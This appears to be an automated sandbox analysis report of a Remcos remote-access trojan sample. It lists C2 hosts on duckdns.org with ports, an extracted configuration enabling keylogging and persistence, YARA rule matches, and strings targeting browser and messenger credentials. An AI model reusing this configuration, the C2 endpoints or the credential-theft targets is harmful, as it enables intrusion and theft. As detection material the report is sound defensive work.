Source: sarok7lmoutsg5.duckdns.org |
Avira URL Cloud: Label: malware |
Source: sarok7lmoutsg3.duckdns.org |
Avira URL Cloud: Label: malware |
Source: sarok7lmoutsg1.duckdns.org |
Avira URL Cloud: Label: malware |
Source: sarok7lmoutsg4.duckdns.org |
Avira URL Cloud: Label: malware |
Source: sarok7lmoutsg2.duckdns.org |
Avira URL Cloud: Label: malware |
Source: 5.2.powershell.exe.8a51288.5.raw.unpack |
Malware Configuration Extractor: Remcos {"Host:Port:Password": ["sarok7lmoutsg1.duckdns.org:3990:0", "sarok7lmoutsg1.duckdns.org:3991:1", "sarok7lmoutsg2.duckdns.org:3990:0", "sarok7lmoutsg3.duckdns.org:3990:0", "sarok7lmoutsg4.duckdns.org:3990:0", "sarok7lmoutsg5.duckdns.org:3990:0"], "Assigned name": "Year", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "klmiurtg-1R3I3X", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "kalmzots.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": ""} |
Source: Yara match |
File source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR |
Source: Yara match |
File source: C:\Users\user\AppData\Roaming\kalmzots.dat, type: DROPPED |
Source: Yara match |
File source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 5_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, |
5_2_100010F1 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 5_2_10006580 FindFirstFileExA, |
5_2_10006580 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_0040B477 FindFirstFileW,FindNextFileW, |
12_2_0040B477 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, |
13_2_00407EF8 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, |
16_2_00407898 |
Source: Malware configuration extractor |
URLs: sarok7lmoutsg1.duckdns.org |
Source: Malware configuration extractor |
URLs: sarok7lmoutsg1.duckdns.org |
Source: Malware configuration extractor |
URLs: sarok7lmoutsg2.duckdns.org |
Source: Malware configuration extractor |
URLs: sarok7lmoutsg3.duckdns.org |
Source: Malware configuration extractor |
URLs: sarok7lmoutsg4.duckdns.org |
Source: Malware configuration extractor |
URLs: sarok7lmoutsg5.duckdns.org |
Source: unknown |
DNS query: name: sarok7lmoutsg2.duckdns.org |
Source: unknown |
DNS query: name: sarok7lmoutsg3.duckdns.org |
Source: unknown |
DNS query: name: sarok7lmoutsg5.duckdns.org |
Source: unknown |
DNS query: name: sarok7lmoutsg4.duckdns.org |
Source: unknown |
DNS query: name: sarok7lmoutsg1.duckdns.org |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: powershell.exe, 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook) |
Source: powershell.exe, 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo) |
Source: powershell.exe, 00000005.00000002.3676317602.0000000007340000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy) |
Source: powershell.exe, 00000005.00000002.3676317602.0000000007340000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy) |
Source: recover.exe |
String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook) |
Source: recover.exe, 0000000C.00000003.1571760999.0000000004781000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000C.00000003.1571871550.0000000004784000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imgres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login? equals www.facebook.com (Facebook) |
Source: recover.exe, 0000000C.00000003.1571760999.0000000004781000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000C.00000003.1571871550.0000000004784000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imgres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login? equals www.yahoo.com (Yahoo) |
Source: global traffic |
DNS traffic detected: DNS query: sarok7lmoutsg1.duckdns.org |
Source: global traffic |
DNS traffic detected: DNS query: sarok7lmoutsg2.duckdns.org |
Source: global traffic |
DNS traffic detected: DNS query: sarok7lmoutsg3.duckdns.org |
Source: global traffic |
DNS traffic detected: DNS query: sarok7lmoutsg4.duckdns.org |
Source: global traffic |
DNS traffic detected: DNS query: sarok7lmoutsg5.duckdns.org |
Source: global traffic |
DNS traffic detected: DNS query: geoplugin.net |
Source: bhvFB86.tmp.12.dr |
String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0 |
Source: bhvFB86.tmp.12.dr |
String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B |
Source: powershell.exe, 00000005.00000002.3677060324.0000000007500000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro9 |
Source: bhvFB86.tmp.12.dr |
String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0 |
Source: bhvFB86.tmp.12.dr |
String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07 |
Source: bhvFB86.tmp.12.dr |
String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0 |
Source: powershell.exe, 00000005.00000002.3680600008.0000000008407000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3677060324.0000000007500000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3677060324.0000000007566000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3677060324.00000000075E9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gp |
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gp%Mq |
Source: powershell.exe, 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gp/C |
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gpF_ |
Source: powershell.exe, 00000005.00000002.3680600008.0000000008407000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gpSystem32 |
Source: powershell.exe, 00000005.00000002.3677060324.0000000007500000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gpi |
Source: powershell.exe, 00000005.00000002.3668466296.0000000005F7C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: bhvFB86.tmp.12.dr |
String found in binary or memory: http://ocsp.digicert.com0 |
Source: powershell.exe, 00000005.00000002.3664871938.000000000506D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000005.00000002.3664871938.0000000004F11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000005.00000002.3664871938.000000000506D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000005.00000002.3676317602.0000000007340000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.ebuddy.com |
Source: powershell.exe, 00000005.00000002.3676317602.0000000007340000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp, recover.exe, 00000010.00000003.1560131989.000000000368C000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000010.00000003.1559693994.000000000368C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.imvu.com |
Source: powershell.exe, 00000005.00000002.3676317602.0000000007340000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com |
Source: powershell.exe, 00000005.00000002.3676317602.0000000007340000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.imvu.comr |
Source: recover.exe, 00000010.00000003.1560131989.000000000368C000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000010.00000003.1559693994.000000000368C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.imvu.comta |
Source: recover.exe, 0000000C.00000002.1572087584.00000000027D3000.00000004.00000010.00020000.00000000.sdmp |
String found in binary or memory: http://www.nirsoft.net |
Source: recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.nirsoft.net/ |
Source: powershell.exe, 00000005.00000002.3664871938.0000000004F11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000005.00000002.3668466296.0000000005F7C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000005.00000002.3668466296.0000000005F7C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000005.00000002.3668466296.0000000005F7C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000005.00000002.3664871938.000000000506D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: recover.exe, 0000000C.00000003.1571760999.0000000004781000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000C.00000003.1571871550.0000000004784000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv |
Source: recover.exe |
String found in binary or memory: https://login.yahoo.com/config/login |
Source: powershell.exe, 00000005.00000002.3668466296.0000000005F7C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000005.00000002.3676317602.0000000007340000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: recover.exe |
String found in binary or memory: https://www.google.com/accounts/servicelogin |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_00409E39 EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, |
12_2_00409E39 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_00409EA1 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, |
12_2_00409EA1 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, |
13_2_00406DFC |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, |
13_2_00406E9F |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 16_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, |
16_2_004068B5 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 16_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, |
16_2_004072B5 |
Source: Yara match |
File source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR |
Source: Yara match |
File source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR |
Source: Yara match |
File source: C:\Users\user\AppData\Roaming\kalmzots.dat, type: DROPPED |
Source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown |
Source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE |
Matched rule: REMCOS_RAT_variants Author: unknown |
Source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen |
Source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown |
Source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE |
Matched rule: REMCOS_RAT_variants Author: unknown |
Source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE |
Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen |
Source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown |
Source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown |
Source: 00000005.00000002.3689629684.000000000AA0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 00000005.00000002.3674098163.0000000006A82000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 00000005.00000002.3668466296.00000000066EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR |
Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown |
Source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 5_2_06AFF3B0 NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtMapViewOfSection, |
5_2_06AFF3B0 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, |
12_2_0040BAE3 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_004016FD NtdllDefWindowProc_A, |
13_2_004016FD |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_004017B7 NtdllDefWindowProc_A, |
13_2_004017B7 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 16_2_00402CAC NtdllDefWindowProc_A, |
16_2_00402CAC |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 16_2_00402D66 NtdllDefWindowProc_A, |
16_2_00402D66 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 5_2_10017194 |
5_2_10017194 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 5_2_1000B5C1 |
5_2_1000B5C1 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 5_2_06AFF3B0 |
5_2_06AFF3B0 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 5_2_07632FE4 |
5_2_07632FE4 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 5_2_07632F92 |
5_2_07632F92 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 5_2_07631298 |
5_2_07631298 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_0044A030 |
12_2_0044A030 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_0040612B |
12_2_0040612B |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_0043E13D |
12_2_0043E13D |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_0044B188 |
12_2_0044B188 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_00442273 |
12_2_00442273 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_0044D380 |
12_2_0044D380 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_0044A5F0 |
12_2_0044A5F0 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_004125F6 |
12_2_004125F6 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_004065BF |
12_2_004065BF |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_004086CB |
12_2_004086CB |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_004066BC |
12_2_004066BC |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_0044D760 |
12_2_0044D760 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_00405A40 |
12_2_00405A40 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_00449A40 |
12_2_00449A40 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_00405AB1 |
12_2_00405AB1 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_00405B22 |
12_2_00405B22 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_0044ABC0 |
12_2_0044ABC0 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_00405BB3 |
12_2_00405BB3 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_00417C60 |
12_2_00417C60 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_0044CC70 |
12_2_0044CC70 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_00418CC9 |
12_2_00418CC9 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_0044CDFB |
12_2_0044CDFB |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_0044CDA0 |
12_2_0044CDA0 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_0044AE20 |
12_2_0044AE20 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_00415E3E |
12_2_00415E3E |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_00437F3B |
12_2_00437F3B |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_00405038 |
13_2_00405038 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_0041208C |
13_2_0041208C |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_004050A9 |
13_2_004050A9 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_0040511A |
13_2_0040511A |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_0043C13A |
13_2_0043C13A |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_004051AB |
13_2_004051AB |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_00449300 |
13_2_00449300 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_0040D322 |
13_2_0040D322 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_0044A4F0 |
13_2_0044A4F0 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_0043A5AB |
13_2_0043A5AB |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_00413631 |
13_2_00413631 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_00446690 |
13_2_00446690 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_0044A730 |
13_2_0044A730 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_004398D8 |
13_2_004398D8 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_004498E0 |
13_2_004498E0 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_0044A886 |
13_2_0044A886 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_0043DA09 |
13_2_0043DA09 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_00438D5E |
13_2_00438D5E |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_00449ED0 |
13_2_00449ED0 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_0041FE83 |
13_2_0041FE83 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 13_2_00430F54 |
13_2_00430F54 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 16_2_004050C2 |
16_2_004050C2 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 16_2_004014AB |
16_2_004014AB |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 16_2_00405133 |
16_2_00405133 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 16_2_004051A4 |
16_2_004051A4 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 16_2_00401246 |
16_2_00401246 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 16_2_0040CA46 |
